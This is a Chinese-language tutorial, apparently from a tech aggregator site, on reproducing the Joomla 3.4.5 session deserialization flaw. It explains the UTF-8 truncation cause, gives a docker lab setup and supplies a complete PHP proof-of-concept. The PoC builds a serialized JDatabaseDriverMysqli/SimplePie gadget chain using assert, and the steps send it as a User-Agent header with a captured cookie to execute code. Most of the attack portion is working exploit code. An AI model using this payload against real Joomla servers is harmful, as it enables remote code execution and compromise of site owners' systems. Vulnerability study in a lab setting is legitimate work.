Joomla 3.4.5 反序列化漏洞

编程入门 行业动态 更新时间:2024-10-11 03:24:41

Joomla 3.4.5 反序列化<a href=https://www.elefans.com/category/jswz/34/1770270.html style=漏洞"/>

Joomla 3.4.5 反序列化漏洞

Joomla 3.4.5 反序列化漏洞

1.漏洞原理

​ 本漏洞根源是PHP5.6.13前的版本在读取存储号的session时,如果反序列化出错则会跳过当前一段数据而去反序列化下一段数据。而Joomla将session存储在Mysql数据库中,编码是utf8,当我们插入4字节的utf8数据时则会导致截断。截断后的数据在反序列化时就会失败,最后触发反序列化漏洞。

2.漏洞环境

docker-compose up -d# 启动后访问http://192.168.184.130:8080/


3.漏洞复现

不带User-Agent头,先访问一次目标主页,然后记下cookie

Cookie:f4bdb0e2406efb11a23e28f0b118151a=282589ba97b9e9ee3776e827762b5e63;

生成POC:

<?php
class JSimplepieFactory {
}
class JDatabaseDriverMysql {}
class SimplePie {var $sanitize;var $cache;var $cache_name_function;var $javascript;var $feed_url;function __construct(){$this->feed_url = "phpinfo();JFactory::getConfig();exit;";$this->javascript = 9999;$this->cache_name_function = "assert";$this->sanitize = new JDatabaseDriverMysql();$this->cache = true;}
}class JDatabaseDriverMysqli {protected $a;protected $disconnectHandlers;protected $connection;function __construct(){$this->a = new JSimplepieFactory();$x = new SimplePie();$this->connection = 1;$this->disconnectHandlers = [[$x, "init"],];}
}$a = new JDatabaseDriverMysqli();
$poc = serialize($a); $poc = str_replace("\x00*\x00", '\\0\\0\\0', $poc);echo "123}__test|{$poc}\xF0\x9D\x8C\x86";

将生成好的POC作为User-Agent,带上第一步获取的Cookie发包,这一次发包,脏数据进入Mysql数据库。然后同样的包再发一次,我们的代码被执行

参考链接:/

更多推荐

Joomla 3.4.5 反序列化漏洞

本文发布于:2024-02-06 04:59:47,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1746531.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:漏洞   序列化   Joomla

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!